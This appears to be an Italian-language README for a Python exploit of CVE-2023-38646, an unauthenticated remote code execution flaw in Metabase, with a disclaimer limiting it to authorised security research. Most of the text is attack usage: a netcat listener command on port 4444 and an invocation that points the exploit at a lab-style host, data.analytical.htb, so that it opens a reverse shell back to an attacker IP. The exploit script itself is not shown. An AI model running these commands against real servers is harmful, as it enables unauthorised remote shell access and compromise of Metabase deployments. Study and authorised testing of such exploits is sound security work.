
Exploit Python per CVE-2023-38646, una vulnerabilità di esecuzione remota di codice senza autenticazione in Metabase, che fornisce una reverse shell per test di sicurezza autorizzati.
⚠️ Solo per scopi educativi e di ricerca sulla sicurezza autorizzata
Molto grato all'autore originale del PoC securezeron
Configura il Listener sulla tua macchina attaccante:
nc -nlvp 4444
Quindi, esegui questo comando:
python3 CVE-2023-38646-Reverse-Shell.py -h
python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
